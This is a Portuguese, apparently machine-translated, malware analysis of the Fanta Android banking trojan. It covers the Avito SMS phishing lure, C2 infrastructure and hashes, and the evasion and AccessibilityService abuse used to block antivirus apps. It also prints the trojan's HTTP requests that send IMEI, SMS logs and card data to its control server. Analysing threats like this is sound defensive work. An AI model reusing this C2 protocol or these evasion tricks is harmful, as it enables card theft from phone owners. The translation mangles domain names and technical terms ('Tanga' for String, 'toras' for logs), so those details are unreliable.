Um dia você deseja vender algo no Avito e, após postar uma descrição detalhada do seu produto (por exemplo, um módulo de RAM), receberá esta mensagem:
Depois de abrir o link, você verá uma página aparentemente inócua notificando você, o vendedor feliz e bem-sucedido, de que uma compra foi feita:
Depois de clicar no botão “Continuar”, um arquivo APK com um ícone e um nome inspirador será baixado para o seu dispositivo Android. Você instalou um aplicativo que por algum motivo solicitou direitos de AccessibilityService, então algumas janelas apareceram e desapareceram rapidamente e... É isso.
Você vai verificar seu saldo, mas por algum motivo seu aplicativo bancário pede novamente os dados do seu cartão. Depois de inserir os dados, algo terrível acontece: por algum motivo que ainda não está claro para você, o dinheiro começa a desaparecer da sua conta. Você está tentando resolver o problema, mas seu telefone resiste: pressiona as teclas “Voltar” e “Home”, não desliga e não permite ativar nenhuma medida de segurança. Com isso, você fica sem dinheiro, seus bens não foram comprados, você fica confuso e se pergunta: o que aconteceu?
A resposta é simples: você foi vítima do Trojan Android Fanta, um membro da família Flexnet. Como isso aconteceu? Vamos explicar agora.
Autores: Andrey Polovinkin, especialista júnior em análise de malware, Ivan Pisarev, especialista em análise de malware.
ESTATÍSTICAS
A família Flexnet de Trojans Android tornou-se conhecida pela primeira vez em 2015. Durante um período de atividade bastante longo, a família expandiu-se para várias subespécies: Fanta, Limebot, Lipton, etc. O Trojan, bem como a infraestrutura a ele associada, não param: novos esquemas de distribuição eficazes estão sendo desenvolvidos - no nosso caso, páginas de phishing de alta qualidade destinadas a um usuário-vendedor específico, e os desenvolvedores do Trojan seguem as tendências da moda em gravação de vírus - adição de novas funcionalidades que tornam possível roubar dinheiro de dispositivos infectados com mais eficiência e contornar mecanismos de proteção.
A campanha descrita neste artigo destina-se a utilizadores da Rússia; um pequeno número de dispositivos infectados foi registado na Ucrânia e ainda menos no Cazaquistão e na Bielorrússia.
Embora o Flexnet esteja na arena do Trojan Android há mais de 4 anos e tenha sido estudado detalhadamente por muitos pesquisadores, ele ainda está em boa forma. A partir de janeiro de 2019, o valor potencial do dano é superior a 35 milhões de rublos - e isso se aplica apenas a campanhas na Rússia. Em 2015, várias versões deste Trojan Android foram vendidas em fóruns clandestinos, onde também foi possível encontrar o código-fonte do Trojan com uma descrição detalhada. Isto significa que as estatísticas de danos no mundo são ainda mais impressionantes. Não é um mau indicador para um homem tão velho, não é?
Da venda ao engano
Como pode ser visto na captura de tela apresentada anteriormente de uma página de phishing do serviço de Internet para publicação de anúncios Avito, ela foi preparada para uma vítima específica. Aparentemente, os invasores usam um dos analisadores do Avito, que extrai o número de telefone e o nome do vendedor, bem como a descrição do produto. Após expandir a página e preparar o arquivo APK, a vítima recebe um SMS com seu nome e um link para uma página de phishing contendo a descrição de seu produto e o valor recebido pela “venda” do produto. Ao clicar no botão, o usuário recebe um arquivo APK malicioso – Fanta.
Um estudo do domínio shcet491[.]ru mostrou que ele é delegado aos servidores DNS da Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
O arquivo de zona de domínio contém entradas apontando para os endereços IP 31.220.23[.]236, 31.220.23[.]243 e 31.220.23[.]235. No entanto, o registro de recurso primário do domínio (registro A) aponta para um servidor com endereço IP 178.132.1[.]240.
O endereço IP 178.132.1[.]240 está localizado na Holanda e pertence ao hoster Stream Mundial. Os endereços IP 31.220.23[.]235, 31.220.23[.]236 e 31.220.23[.]243 estão localizados no Reino Unido e pertencem ao servidor de hospedagem compartilhada HOSTINGER. Usado como gravador openprov-ru. Os seguintes domínios também foram resolvidos para o endereço IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Deve-se observar que links no seguinte formato estavam disponíveis em quase todos os domínios:
http://(www.){0,1}<%domain%>/[0-9]{7}
Este modelo também inclui um link de uma mensagem SMS. Com base em dados históricos, constatou-se que um domínio corresponde a vários links no padrão descrito acima, o que indica que um domínio foi usado para distribuir o Trojan a várias vítimas.
Vamos avançar um pouco: o Trojan baixado por meio de um link de um SMS usa o endereço como servidor de controle onusedseddohap[.]clube. Este domínio foi registrado em 2019/03/12 e, a partir de 2019/04/29, os aplicativos APK interagiram com este domínio. Com base nos dados obtidos do VirusTotal, um total de 109 aplicativos interagiram com este servidor. O próprio domínio foi resolvido para o endereço IP 217.23.14[.]27, localizado na Holanda e de propriedade do hoster Stream Mundial. Usado como gravador namecheap. Domínios também resolvidos para este endereço IP guaxinim ruim[.]clube (a partir de 2018/09/25) e guaxinim ruim[.]ao vivo (a partir de 2018/10/25). Com domínio guaxinim ruim[.]clube mais de 80 arquivos APK interagiram com guaxinim ruim[.]ao vivo - mais de 100.
Em geral, o ataque progride da seguinte forma:
O que há sob a tampa da Fanta?
Como muitos outros Trojans Android, o Fanta é capaz de ler e enviar mensagens SMS, fazer solicitações USSD e exibir suas próprias janelas sobre aplicativos (inclusive bancários). Porém, o arsenal de funcionalidades desta família chegou: Fanta passou a usar Serviço de Acessibilidade para diversos fins: ler o conteúdo de notificações de outros aplicativos, impedir a detecção e interromper a execução de um Trojan em um dispositivo infectado, etc. Fanta funciona em todas as versões do Android, até 4.4. Neste artigo, examinaremos mais de perto o seguinte exemplo de Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Imediatamente após o lançamento
Imediatamente após o lançamento, o Trojan oculta seu ícone. O aplicativo só funcionará se o nome do dispositivo infectado não estiver na lista:
- android_x86
- VirtualBox
- Nexus 5X (cabeça-de-boi)
- Nexus 5 (navalha)
Esta verificação é realizada no serviço principal do Trojan - Serviço Principal. Quando iniciado pela primeira vez, os parâmetros de configuração do aplicativo são inicializados com valores padrão (o formato para armazenar dados de configuração e seu significado serão discutidos posteriormente) e um novo dispositivo infectado é registrado no servidor de controle. Uma solicitação HTTP POST com o tipo de mensagem será enviada ao servidor registrar_bot e informações sobre o dispositivo infectado (versão do Android, IMEI, número de telefone, nome da operadora e código do país em que a operadora está registrada). O endereço serve como servidor de controle hXXp://onuseseddohap[.]club/controller.php. Em resposta, o servidor envia uma mensagem contendo os campos bot_id, bot_pwd, servidor — a aplicação salva esses valores como parâmetros do servidor CnC. Parâmetro servidor opcional caso o campo não tenha sido recebido: Fanta utiliza o endereço de cadastro - hXXp://onuseseddohap[.]club/controller.php. A função de alteração do endereço CnC pode ser utilizada para resolver dois problemas: distribuir a carga uniformemente entre vários servidores (se houver um grande número de dispositivos infectados, a carga em um servidor web não otimizado pode ser alta), e também para usar um servidor alternativo em caso de falha de um dos servidores CnC.
Se ocorrer um erro ao enviar a solicitação, o Trojan repetirá o processo de registro após 20 segundos.
Assim que o dispositivo for registrado com sucesso, o Fanta exibirá a seguinte mensagem ao usuário:
Nota importante: o serviço chamado Sistema de segurança — o nome do serviço Trojan e depois de clicar no botão Ok Será aberta uma janela com as configurações de Acessibilidade do dispositivo infectado, onde o usuário deverá conceder direitos de Acessibilidade para o serviço malicioso:
Assim que o usuário ligar Serviço de Acessibilidade, Fanta ganha acesso ao conteúdo das janelas do aplicativo e às ações realizadas nelas:
Imediatamente após receber direitos de acessibilidade, o Trojan solicita direitos de administrador e direitos para ler notificações:
Utilizando o AccessibilityService, o aplicativo simula o pressionamento de teclas, concedendo-se assim todos os direitos necessários.
Fanta cria múltiplas instâncias de banco de dados (que serão descritas posteriormente) necessárias para armazenar dados de configuração, bem como informações coletadas no processo sobre o dispositivo infectado. Para enviar as informações coletadas, o Trojan cria uma tarefa repetitiva projetada para baixar campos do banco de dados e receber um comando do servidor de controle. O intervalo de acesso ao CnC é definido dependendo da versão do Android: no caso do 5.1, o intervalo será de 10 segundos, caso contrário, 60 segundos.
Para receber o comando, Fanta faz um pedido ObterTask para o servidor de gerenciamento. Em resposta, o CnC pode enviar um dos seguintes comandos:
| Equipe | descrição |
|---|---|
| 0 | Enviar mensagem SMS |
| 1 | Faça uma ligação ou comando USSD |
| 2 | Atualiza um parâmetro intervalo |
| 3 | Atualiza um parâmetro interceptar |
| 6 | Atualiza um parâmetro gerenciador de sms |
| 9 | Comece a coletar mensagens SMS |
| 11 | Redefina seu telefone para as configurações de fábrica |
| 12 | Ativar/desativar o registro de criação de caixa de diálogo |
A Fanta também coleta notificações de 70 aplicativos bancários, sistemas de pagamento rápido e carteiras eletrônicas e as armazena em um banco de dados.
Armazenando parâmetros de configuração
Para armazenar parâmetros de configuração, Fanta usa uma abordagem padrão para a plataforma Android - Preferencias-arquivos. As configurações serão salvas em um arquivo chamado Configurações. Uma descrição dos parâmetros salvos está na tabela abaixo.
| nome | Valor padrão | Valores possíveis | descrição |
|---|---|---|---|
| id | 0 | Número inteiro | ID do bot |
| servidor | hXXp://onuseseddohap[.]club/ | URL | Endereço do servidor de controle |
| pwd | - | Tanga | Senha do servidor |
| intervalo | 20 | Número inteiro | Intervalo de tempo. Indica por quanto tempo as seguintes tarefas devem ser adiadas:
|
| interceptar | todos os | todos/telNúmero | Se o campo for igual à string todos os ou número de telefone, então a mensagem SMS recebida será interceptada pelo aplicativo e não será mostrada ao usuário |
| gerenciador de sms | 0 | 0/1 | Ativar/desativar o aplicativo como destinatário padrão de SMS |
| lerDialog | falso | Verdadeiro falso | Ativar/desativar registro de eventos Evento de acessibilidade |
Fanta também usa o arquivo gerenciador de sms:
| nome | Valor padrão | Valores possíveis | descrição |
|---|---|---|---|
| pacote | - | Tanga | Nome do gerenciador de mensagens SMS usado |
Interação com bancos de dados
Durante sua operação, o Trojan usa dois bancos de dados. Banco de dados nomeado a usado para armazenar diversas informações coletadas do telefone. O segundo banco de dados é nomeado fanta.db e é usado para salvar configurações responsáveis pela criação de janelas de phishing projetadas para coletar informações sobre cartões bancários.
Trojan usa banco de dados а para armazenar informações coletadas e registrar suas ações. Os dados são armazenados em uma tabela toras. Para criar uma tabela, use a seguinte consulta SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)O banco de dados contém as seguintes informações:
1. Registrando a inicialização do dispositivo infectado com uma mensagem O telefone ligou!
2. Notificações de aplicativos. A mensagem é gerada de acordo com o seguinte modelo:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dados de cartão bancário de formulários de phishing criados pelo Trojan. Parâmetro VIEW_NAME pode ser um dos seguintes:
- AliExpress
- Avito
- Google Play
- Diversos <%Nome do aplicativo%>
A mensagem é registrada no formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Mensagens SMS recebidas/saídas no formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informações sobre o pacote que cria a caixa de diálogo no formato:
(<%Package name%>)<%Package information%>
Tabela de exemplo toras:
Uma das funcionalidades do Fanta é a coleta de informações sobre cartões bancários. A coleta de dados ocorre por meio da criação de janelas de phishing na abertura de aplicativos bancários. O Trojan cria a janela de phishing apenas uma vez. As informações que a janela foi mostrada ao usuário são armazenadas em uma tabela Configurações no banco de dados fanta.db. Para criar um banco de dados, use a seguinte consulta SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Todos os campos da tabela Configurações por padrão inicializado em 1 (crie uma janela de phishing). Após o usuário inserir seus dados, o valor será definido como 0. Exemplo de campos da tabela Configurações:
- can_login — o campo é responsável por exibir o formulário ao abrir um aplicativo bancário
- primeiro_banco - não usado
- can_avito — o campo é responsável por exibir o formulário ao abrir o aplicativo Avito
- can_ali — o campo é responsável por exibir o formulário ao abrir o aplicativo Aliexpress
- pode_outro — o campo é responsável por exibir o formulário ao abrir qualquer aplicação da lista: Yula, Pandao, Drom Auto, Carteira. Cartões de desconto e bônus, Aviasales, Booking, Trivago
- can_card — o campo é responsável por exibir o formulário ao abrir Google Play
Interação com o servidor de gerenciamento
A interação da rede com o servidor de gerenciamento ocorre através do protocolo HTTP. Para trabalhar com a rede, Fanta usa a popular biblioteca Retrofit. As solicitações são enviadas para: hXXp://onuseseddohap[.]club/controller.php. O endereço do servidor pode ser alterado durante o registro no servidor. Os cookies podem ser enviados em resposta do servidor. Fanta faz as seguintes solicitações ao servidor:
- O registro do bot no servidor de controle ocorre uma vez, na primeira inicialização. Os seguintes dados sobre o dispositivo infectado são enviados ao servidor:
· Cookie — cookies recebidos do servidor (o valor padrão é uma string vazia)
· modo - constante de string registrar_bot
· prefixo - constante inteira 2
· versão_sdk — é formado de acordo com o seguinte modelo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI do dispositivo infectado
· país — código do país em que o operador está registado, em formato ISO
· número - número de telefone
· operador - nome do operadorUm exemplo de solicitação enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Em resposta à solicitação, o servidor deve retornar um objeto JSON contendo os seguintes parâmetros:
· bot_id — ID do dispositivo infectado. Se bot_id for igual a 0, Fanta reexecutará a solicitação.
bot_pwd — senha do servidor.
servidor — controlar o endereço do servidor. Parâmetro opcional. Caso o parâmetro não seja especificado, será utilizado o endereço salvo na aplicação.Exemplo de objeto JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Solicitação para receber um comando do servidor. Os seguintes dados são enviados ao servidor:
· Cookie — cookies recebidos do servidor
· oferta — id do dispositivo infectado que foi recebido ao enviar a solicitação registrar_bot
· pwd —senha para o servidor
· divice_admin — o campo determina se os direitos de administrador foram obtidos. Se os direitos de administrador foram obtidos, o campo é igual a 1caso contrário 0
· Acessibilidade — Status de operação do Serviço de Acessibilidade. Se o serviço foi iniciado, o valor será 1caso contrário 0
· Gerenciador de SMS — mostra se o Trojan está habilitado como aplicativo padrão para receber SMS
· tela — exibe o estado da tela. O valor será definido 1, se a tela estiver ligada, caso contrário 0;Um exemplo de solicitação enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Dependendo do comando, o servidor pode retornar um objeto JSON com parâmetros diferentes:
· Equipe Enviar mensagem SMS: Os parâmetros contêm o número do telefone, o texto da mensagem SMS e o ID da mensagem que está sendo enviada. O identificador é usado ao enviar uma mensagem ao servidor com o tipo definirSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Equipe Faça uma ligação ou comando USSD: o número de telefone ou comando vem no corpo da resposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Equipe Alterar parâmetro de intervalo.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Equipe Alterar parâmetro de interceptação.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Equipe Alterar campo SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Equipe Colete mensagens SMS de um dispositivo infectado.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Equipe Redefina seu telefone para as configurações de fábrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Equipe Alterar parâmetro ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Enviando uma mensagem com tipo definirSmsStatus. Esta solicitação é feita após a execução do comando Enviar mensagem SMS. A solicitação fica assim:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Fazendo upload do conteúdo do banco de dados. Uma linha é transmitida por solicitação. Os seguintes dados são enviados ao servidor:
· Cookie — cookies recebidos do servidor
· modo - constante de string setSaveInboxSms
· oferta — id do dispositivo infectado que foi recebido ao enviar a solicitação registrar_bot
· texto — texto no registro atual do banco de dados (campo d Da mesa toras no banco de dados а)
· número — nome do registro atual do banco de dados (campo p Da mesa toras no banco de dados а)
· modo_sms — valor inteiro (campo m Da mesa toras no banco de dados а)A solicitação fica assim:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Se enviada com sucesso ao servidor, a linha será excluída da tabela. Exemplo de objeto JSON retornado pelo servidor:
{ "response":[], "status":"ok" }
Interagindo com o AccessibilityService
AccessibilityService foi implementado para tornar os dispositivos Android mais fáceis de usar para pessoas com deficiência. Na maioria dos casos, a interação física é necessária para interagir com um aplicativo. AccessibilityService permite que você faça isso programaticamente. Fanta usa o serviço para criar janelas falsas em aplicativos bancários e impedir que usuários abram configurações do sistema e alguns aplicativos.
Usando a funcionalidade do AccessibilityService, o Trojan monitora alterações em elementos da tela do dispositivo infectado. Conforme descrito anteriormente, as configurações do Fanta contêm um parâmetro responsável por registrar as operações com caixas de diálogo - lerDialog. Se este parâmetro for definido, informações sobre o nome e a descrição do pacote que acionou o evento serão adicionadas ao banco de dados. O Trojan executa as seguintes ações quando os eventos são acionados:
- Simula o pressionamento das teclas Voltar e Home nos seguintes casos:
· se o usuário quiser reiniciar seu dispositivo
· se o usuário deseja excluir o aplicativo “Avito” ou alterar os direitos de acesso
· se houver menção ao aplicativo “Avito” na página
· ao abrir o aplicativo Google Play Protect
· ao abrir páginas com configurações de AccessibilityService
· quando a caixa de diálogo Segurança do Sistema aparece
· ao abrir a página com as configurações “Desenhar sobre outro aplicativo”
· ao abrir a página “Aplicativos”, “Recuperação e redefinição”, “Redefinição de dados”, “Redefinir configurações”, “Painel do desenvolvedor”, “Especial. oportunidades”, “Oportunidades especiais”, “Direitos especiais”
· se o evento foi gerado por determinados aplicativos.Lista de aplicativos
- andróide
- Mestre Lite
- Mestre da limpeza
- Clean Master para CPU x86
- Gerenciamento de permissões de aplicativos Meizu
- MIUI Security
- Clean Master - Antivírus, Cache e Limpador de Lixo
- Controles parentais e GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Limpador de vírus, Antivírus, Limpador (MAX Security)
- Segurança antivírus móvel PRO
- Antivírus Avast e proteção gratuita 2019
- Segurança Móvel MegaFon
- Proteção AVG para Xperia
- Aplicativo móvel
- Malwarebytes antivírus e proteção
- Antivírus para Android 2019
- Mestre de Segurança - Antivírus, VPN, AppLock, Booster
- Antivírus AVG para tablet Huawei System Manager
- Acessibilidade da Samsung
- Gerenciador inteligente da Samsung
- Mestre de segurança
- Impulsionador de velocidade
- Dr.Web
- Dr.Web Security Space
- Centro de Controle Móvel Dr.Web
- Dr.Web Espaço de Segurança Vida
- Centro de Controle Móvel Dr.Web
- Segurança antivírus e móvel
- Kaspersky Internet Security: antivírus e proteção
- Vida útil da bateria Kaspersky: Economia e reforço
- Kaspersky Endpoint Security – proteção e gerenciamento
- AVG Antivirus grátis 2019 – Proteção para Android
- antivírus Android
- Norton Mobile Security e Antivirus
- Antivírus, firewall, VPN, segurança móvel
- Segurança Móvel: antivírus, VPN, proteção contra roubo
- Antivírus para Android
- Caso seja solicitada permissão ao enviar uma mensagem SMS para um número curto, Fanta simula clicar na caixa de seleção Lembre-se da escolha e botão отправить.
- Quando você tenta retirar os direitos de administrador do Trojan, ele bloqueia a tela do telefone.
- Impede a adição de novos administradores.
- Se o aplicativo antivírus dr.web detectou uma ameaça, Fanta imita apertar o botão ignorar.
- O Trojan simula o pressionamento dos botões Voltar e Home se o evento foi gerado pelo aplicativo Cuidados com dispositivos Samsung.
- Fanta cria janelas de phishing com formulários para inserir informações sobre cartões bancários caso um aplicativo de uma lista de cerca de 30 serviços diferentes de Internet seja lançado. Entre eles: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Formulários de phishing
Fanta analisa quais aplicativos estão sendo executados no dispositivo infectado. Se um aplicativo de interesse for aberto, o Trojan exibe uma janela de phishing acima de todas as outras, que é um formulário para inserir informações de cartão bancário. O usuário deverá inserir os seguintes dados:
- Número do cartão
- Data de validade do cartão
- CVV
- Nome do titular do cartão (não para todos os bancos)
Dependendo do aplicativo em execução, diferentes janelas de phishing serão mostradas. Abaixo estão exemplos de alguns deles:
Ali Express:
Avito:
Para algumas outras aplicações, por ex. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Como realmente foi
Felizmente, a pessoa que recebeu a mensagem SMS descrita no início do artigo era um especialista em segurança cibernética. Portanto, a versão real, não-diretor, difere daquela contada anteriormente: uma pessoa recebeu um SMS interessante, após o qual o entregou à equipe de Threat Hunting Intelligence do Grupo-IB. O resultado do ataque é este artigo. Final feliz, certo? Porém, nem todas as histórias terminam com tanto sucesso, e para que a sua não pareça uma versão de diretor com perda de dinheiro, na maioria dos casos basta seguir as seguintes regras há muito descritas:
- não instale aplicativos para um dispositivo móvel com sistema operacional Android de qualquer fonte que não seja o Google Play
- Ao instalar um aplicativo, preste atenção especial aos direitos solicitados pelo aplicativo
- preste atenção às extensões dos arquivos baixados
- instale atualizações do sistema operacional Android regularmente
- não visite recursos suspeitos e não baixe arquivos de lá
- Não clique em links recebidos em mensagens SMS.
Fonte: habr.com